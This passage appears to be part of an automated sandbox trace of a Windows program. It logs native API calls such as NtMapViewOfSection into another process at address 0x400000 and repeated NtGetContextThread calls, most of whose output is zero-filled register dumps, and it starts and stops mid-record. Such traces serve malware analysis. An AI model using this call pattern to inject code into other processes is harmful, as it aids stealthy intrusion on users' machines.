[148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0107.476] NtMapViewOfSection (in: SectionHandle=0x120, ProcessHandle=0x11c, BaseAddress=0x18f618*=0x400000, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x18f614*=0x0, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x18f618*=0x400000, SectionOffset=0x0, ViewSize=0x18f614*=0x0) returned 0xc0000018 [0107.480] NtGetContextThread (in: ThreadHandle=0xfffffffe, Context=0x3875004 | out: Context=0x3875004*(ContextFlags=0x10010, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0x0, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0107.484] NtClose (Handle=0x124) returned 0x0 [0107.488] NtGetContextThread (in: ThreadHandle=0xfffffffe, Context=0x3875004 | out: Context=0x3875004*(ContextFlags=0x10010, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0x0, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0107.492] NtClose (Handle=0x120) returned 0x0 [0107.496] NtGetContextThread (in: ThreadHandle=0xfffffffe, Context=0x3875004 | out: Context=0x3875004*(ContextFlags=0x10010, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0x0, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, 